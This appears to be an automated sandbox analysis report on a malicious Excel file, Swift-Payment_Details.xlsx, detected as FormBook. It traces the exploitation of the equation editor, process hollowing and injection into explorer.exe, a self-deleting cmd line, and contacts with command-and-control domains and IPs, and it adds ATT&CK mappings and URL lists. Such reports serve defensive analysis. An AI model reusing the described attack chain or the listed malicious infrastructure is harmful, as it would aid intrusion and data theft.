          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 62.149.128.40 80
          Source: C:\Windows\explorer.exeNetwork Connect: 173.255.194.134 80
          Source: C:\Windows\explorer.exeDomain query: www.envisionfordheights.com
          Source: C:\Windows\explorer.exeDomain query: www.theshapecreator.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.melodezu.com
          Source: C:\Windows\explorer.exeNetwork Connect: 64.227.87.162 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.194 80
          Source: C:\Windows\explorer.exeDomain query: www.scuolatua.com
          Source: C:\Windows\explorer.exeDomain query: www.anthonysavillemiddleschool.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 140000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2187955907.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2162798517.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2372390654.0000000000A30000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0040205A EntryPoint,GetVersion,GetStartupInfoW,GetModuleHandleA,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Masquerading111OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information31LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452647 Sample: Swift-Payment_Details.xlsx Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 39 www.sprinkleresources.com 2->39 41 sprinkleresources.com 2->41 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 10 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 30 2->16         started        signatures3 process4 dnsIp5 49 192.210.173.40, 49167, 80 AS-COLOCROSSINGUS United States 11->49 33 C:\Users\user\AppData\...\loader1[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 vbc.exe 11->18         started        37 C:\Users\...\~$Swift-Payment_Details.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 51 Detected unpacking (changes PE section rights) 18->51 53 Maps a DLL or memory area into another process 18->53 55 Tries to detect virtualization through RDTSC time measurements 18->55 21 vbc.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 43 www.theshapecreator.com 217.160.0.194, 49172, 80 ONEANDONE-ASBrauerstrasse48DE Germany 24->43 45 www.anthonysavillemiddleschool.com 173.255.194.134, 49168, 80 LINODE-APLinodeLLCUS United States 24->45 47 5 other IPs or domains 24->47 73 System process connects to network (likely due to code injection or exploit) 24->73 28 wscript.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Swift-Payment_Details.xlsx28%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.wscript.exe.2ac7960.7.unpack100%AviraTR/Patched.Ren.GenDownload File
          9.2.wscript.exe.642310.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.vbc.exe.230000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.vbc.exe.270000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.theshapecreator.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.google.com.br/0%Avira URL Cloudsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.google.com.tw/0%Avira URL Cloudsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://buscar.ozu.es/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          sprinkleresources.com
          78.47.57.7
          truetrue
            unknown
            envisionfordheights.com
            184.168.131.241
            truetrue
              unknown
              www.theshapecreator.com
              217.160.0.194
              truetrueunknown
              www.scuolatua.com
              62.149.128.40
              truetrue
                unknown
                melodezu.com
                64.227.87.162
                truetrue
                  unknown
                  www.anthonysavillemiddleschool.com
                  173.255.194.134
                  truetrue
                    unknown
                    www.melodezu.com
                    unknown
                    unknowntrue
                      unknown
                      www.sprinkleresources.com
                      unknown
                      unknowntrue
                        unknown
                        www.envisionfordheights.com
                        unknown
                        unknowntrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          www.extinctionbrews.com/dy8g/true
                          • Avira URL Cloud: safe
                          low

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.google.com.br/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://search.ebay.de/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.mtv.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://www.rambler.ru/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://buscar.ya.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://asp.usatoday.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://rover.ebay.comexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
                                                    http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      high
                                                      http://search.ebay.in/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        high
                                                        http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://%s.comexplorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        low
                                                        http://msk.afisha.ru/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          high
                                                          http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.google.com.tw/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://search.rediff.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            high
                                                            http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                high
                                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.naver.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  high
                                                                  http://www.google.ru/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://search.daum.net/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://buscar.ozu.es/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://search.about.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.ask.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.cjmall.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://search.centrum.cz/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://suche.t-online.de/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.google.it/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://search.auction.co.kr/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.ceneo.pl/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.amazon.de/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2178982212.00000000085C0000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://sads.myspace.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.sify.com/explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
